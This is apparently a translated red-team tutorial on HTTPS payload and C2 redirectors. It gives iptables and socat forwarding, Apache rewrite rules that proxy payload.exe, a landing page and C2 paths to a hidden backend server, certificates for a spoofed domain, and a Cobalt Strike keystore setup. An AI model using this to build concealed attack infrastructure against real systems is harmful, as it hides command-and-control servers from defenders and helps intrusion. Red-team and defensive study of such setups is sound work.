Time: 2023-02-09 07:30:01 | Source: 建站知识
I have written a lot about using redirectors and how they strengthen red team assessments. Since the first post on the topic, the question I get most often is how to do the same thing for HTTPS traffic. In this post I walk through the different methods of HTTPS redirection and when to use each of them.

(1) iptables

iptables -I INPUT -p tcp -m tcp --dport 443 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination <REMOTE-HOST-IP-ADDRESS>:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1
(2) socat

socat TCP4-LISTEN:443,fork TCP4:<REMOTE-HOST-IP-ADDRESS>:443
If the redirected traffic is heavy (as with C2), socat may start running into problems or slow the host down. If you hit those issues, try iptables instead.

Install Apache2 and enable the modules the redirector needs:

apt-get install apache2
a2enmod ssl rewrite proxy proxy_http
a2ensite default-ssl.conf
service apache2 restart
In the Apache2 configuration file (/etc/apache2/apache2.conf by default), find the Directory tag for the site directory and change None to All:

<Directory /var/www/>
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
Generate a certificate with LetsEncrypt:

sudo service apache2 stop
sudo apt-get install certbot
sudo certbot certonly --standalone -d spoofdomain.com -d www.spoofdomain.com
Modify the certbot command to include, with additional -d flags, any other subdomains that need to be covered. Note that above we specified both the root domain and the www subdomain. Then point the SSL VirtualHost at the new certificate:

SSLCertificateFile /etc/letsencrypt/live/spoofdomain.com/cert.pem
SSLCertificateKeyFile /etc/letsencrypt/live/spoofdomain.com/privkey.pem
Also add the following to the same file, inside the VirtualHost tag:

# Enable SSL
SSLEngine On
# Enable Proxy
SSLProxyEngine On
# Trust Self-Signed Certificates generated by Cobalt Strike
SSLProxyVerify none
SSLProxyCheckPeerCN off
SSLProxyCheckPeerName off
You now have a basic SSL installation with a valid LetsEncrypt certificate. From here, the post shows how to serve the required payload files or web pages, and how to redirect C2 traffic.

RewriteEngine On
RewriteCond %{REQUEST_URI} ^/(payload\.exe|landingpage\.html)/?$ [NC]
RewriteRule ^.*$ http://REMOTE-HOST-IP%{REQUEST_URI} [P]
RewriteRule ^.*$ http://example.com/404? [L,R=302]
A line-by-line breakdown of what the rules do:

1. Enable the rewrite engine.
2. If the request's URI is either '/payload.exe' or '/landingpage.html' (with an optional trailing slash), ignoring case, change the entire request to serve the original request path from the remote host's IP, and keep the user's address bar the same (obscuring the backend server's IP).
3. If the above conditions are not met, change the entire request to http://example.com/404 and drop any query string from the original request. Do not evaluate further rules, and redirect the user, changing their address bar.
Note that the rule set above uses HTTP in the first RewriteRule because payload.exe and landingpage.html are hosted on the backend server over HTTP only.

To let the team server use the same certificate, convert it into a Java keystore:

openssl pkcs12 -export -in fullchain.pem -inkey privkey.pem -out spoofdomain.p12 -name spoofdomain.com -passout pass:mypass
keytool -importkeystore -deststorepass mypass -destkeypass mypass -destkeystore spoofdomain.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass mypass -alias spoofdomain.com
Add the keystore to the Malleable C2 profile:

https-certificate {
    set keystore "spoofdomain.store";
    set password "mypass";
}
When the team server starts, it will use the supplied keystore and SSL file hosting will be enabled.

RewriteEngine On
RewriteCond %{REQUEST_URI} ^/(payload\.exe|landingpage\.html)/?$ [NC]
RewriteRule ^.*$ http://REMOTE-HOST-IP%{REQUEST_URI} [P]
RewriteCond %{REQUEST_URI} ^/(legit-path-1|legit-path-2|stager)/?$ [NC]
RewriteRule ^.*$ https://REMOTE-HOST-IP%{REQUEST_URI} [P]
RewriteRule ^.*$ http://example.com/404? [L,R=302]
A line-by-line breakdown of what the rules do:

1. Enable the rewrite engine.
2. If the request's URI is either '/payload.exe' or '/landingpage.html' (with an optional trailing slash), ignoring case, change the entire request to serve the original request path over HTTP from the remote host's IP, and keep the user's address bar the same (obscuring the backend server's IP).
3. If the request's URI is '/legit-path-1', '/legit-path-2', or '/stager' (with an optional trailing slash), ignoring case, change the entire request to serve the original request path over HTTPS from the remote host's IP, and keep the user's address bar the same (obscuring the backend server's IP).
4. If the above conditions are not met, change the entire request to http://example.com/404 and drop any query string from the original request. Do not evaluate further rules, and redirect the user, changing their address bar.
This is obviously a contrived example that would need a Malleable C2 profile configured to provide some evasion, but the code above should illustrate how to mix HTTP and HTTPS.

Finally, to force plain HTTP requests over to HTTPS:

RewriteEngine On
RewriteCond %{HTTPS} !=on [NC]
RewriteRule ^.*$ https://REDIRECTOR-DOMAIN.com%{REQUEST_URI} [L,R=301]
A line-by-line breakdown of what the rules do:

1. Enable the rewrite engine.
2. If the request's SSL status is NOT "on", change the entire request to serve the original request path from REDIRECTOR-DOMAIN.com over HTTPS, and change the user's address bar to show the redirection. Make the redirect permanent with a 301 code.
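To make the matching behaviour of the mixed rule set and of the HTTP-to-HTTPS rule concrete (the [NC] case-insensitivity, the optional trailing slash, and the trailing '?' that drops the query string), here is an added Python emulation of the rule evaluation order. It is not part of the original post; the backend IP and the redirector domain are constructed placeholders standing in for the page's REMOTE-HOST-IP and REDIRECTOR-DOMAIN.com.

```python
import re
from dataclasses import dataclass

# Constructed placeholders for the values the rules leave symbolic.
REMOTE_HOST_IP = "203.0.113.10"          # TEST-NET-3 address, not a real backend
REDIRECTOR_DOMAIN = "REDIRECTOR-DOMAIN.com"
FALLBACK = "http://example.com/404"

# The two RewriteCond patterns from the mixed rule set; [NC] maps to re.IGNORECASE.
HTTP_BACKEND = re.compile(r"^/(payload\.exe|landingpage\.html)/?$", re.IGNORECASE)
HTTPS_BACKEND = re.compile(r"^/(legit-path-1|legit-path-2|stager)/?$", re.IGNORECASE)


@dataclass(frozen=True)
class Decision:
    action: str    # "proxy" ([P]: address bar unchanged) or "redirect" ([R=...])
    status: int    # 0 for a proxied request, otherwise the HTTP redirect code
    target: str


def route(path: str, query: str = "", https: bool = True) -> Decision:
    """Evaluate the rules in Apache's order for one request.

    `path` is %{REQUEST_URI} (no query string); `query` is %{QUERY_STRING}.
    mod_rewrite passes the original query string through unless the
    substitution itself ends in '?', which is how the 404 rule drops it.
    """
    suffix = f"?{query}" if query else ""
    if not https:
        # RewriteCond %{HTTPS} !=on -> permanent redirect to the HTTPS redirector
        return Decision("redirect", 301, f"https://{REDIRECTOR_DOMAIN}{path}{suffix}")
    if HTTP_BACKEND.match(path):
        # Payload and landing page are proxied to the backend over plain HTTP.
        return Decision("proxy", 0, f"http://{REMOTE_HOST_IP}{path}{suffix}")
    if HTTPS_BACKEND.match(path):
        # C2 paths are proxied to the backend over HTTPS.
        return Decision("proxy", 0, f"https://{REMOTE_HOST_IP}{path}{suffix}")
    # Anything else: 302 to the fallback; the trailing '?' discards the query string.
    return Decision("redirect", 302, FALLBACK)
```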
The rule set above is adapted, with slight modification, from http://AskApache.com (here). The %{HTTPS} variable returns on if the request used SSL/TLS and off if it used plain HTTP.

This article is translated from: https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742
If reposting, please cite the original address: http://www.4hou.com/technology/11132.html